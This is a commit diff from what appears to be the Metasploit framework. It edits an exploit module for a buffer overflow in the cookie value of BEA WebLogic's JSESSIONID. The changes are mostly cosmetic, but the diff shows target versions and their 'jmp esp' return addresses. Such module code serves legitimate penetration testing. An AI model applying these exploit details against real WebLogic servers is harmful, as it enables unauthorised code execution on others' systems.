minor cleanups, removed 0day text, Fixes #573
git-svn-id: file:///home/svn/framework3/trunk@7646 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
16ae0112d1
commit
ec45ea8c22
|
@ -14,9 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'BEA Weblogic JSESSIONID cookie value overflow',
|
'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a 0day in the JSESSION cookie value when clustering is configured.
|
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
|
||||||
|
code is only accessible when clustering is configured. A request containing a
|
||||||
|
long JSESSION cookie value can lead to arbirtary code execution.
|
||||||
},
|
},
|
||||||
'Author' => 'pusscat',
|
'Author' => 'pusscat',
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -39,12 +41,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows Apache 2.2 - weblogic module version 1.0.1136334',
|
[ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
|
||||||
{
|
{
|
||||||
'Ret' => 0x1006c9b5, # jmp esp
|
'Ret' => 0x1006c9b5, # jmp esp
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[ 'Windows Apache 2.2 - weblogic module version 1.0.1150354',
|
[ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
|
||||||
{
|
{
|
||||||
'Ret' => 0x1006c9be, # jmp esp
|
'Ret' => 0x1006c9be, # jmp esp
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue